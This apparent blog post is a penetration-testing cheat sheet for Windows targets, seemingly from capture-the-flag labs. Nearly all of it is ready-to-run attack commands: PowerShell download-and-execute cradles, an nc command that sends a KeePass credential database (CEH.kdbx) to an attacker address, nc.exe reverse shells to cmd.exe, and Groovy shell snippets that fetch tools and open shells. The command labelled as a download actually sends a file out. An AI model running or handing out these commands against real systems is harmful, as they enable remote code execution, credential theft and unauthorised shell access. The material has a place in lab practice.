Download a File using Power Shell:
powershell -Command (new-object System.Net.WebClient).Downloadfile('http://10.10.14.19:8001/41015.exe', 'shell.exe')
Download a File Using Power Shell:
nc.exe 10.10.14.19 8002 < CEH.kdbx
Download and Execute Powershell Script on Victim Machine
Powershell IEX(new-object Net.WebClient).Downloadstring(\"http://10.10.14.35:8001/revs.ps1\")
python -m SimpleHTTPServer 8001
nc -nvlp 9001
#Reverse Shell Used is Nishang Invoke-Powershell-TCP.ps1
Download and Execute Powershell Script on Victim Machine - Method II
powershell Invoke-WebRequest -Uri 10.10.14.35:8001/nc.exe -OutFile C:\Users\Administrator\downloads\nc.exe
python -m SimpleHTTPServer 8001
C:\users\administrator\downloads\nc.exe -e cmd 10.10.14.35 9001
nc -nvlp 9001
Execute a Command in Java Shell:
def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}");
Execute a Command in Java Shell:
println "cmd.exe /c dir".execute().text
Upload a file using Power shell: in a java shell
def process = "powershell -command Invoke-WebRequest 'http://10.10.14.19:8001/nc.exe' -OutFile nc.exe".execute();
println("${process.text}");
Get a Reverse Shell using Powershell:
def process = "powershell -command ./nc.exe 10.10.14.19 9001 -e cmd.exe".execute();
println("${process.text}");
nc.exe should be in the same directory; use the above command to download it.
Check for Hidden Files:
get-content .\root.txt -stream *
get-content .\root.txt -stream root.txt
Comments
Post a Comment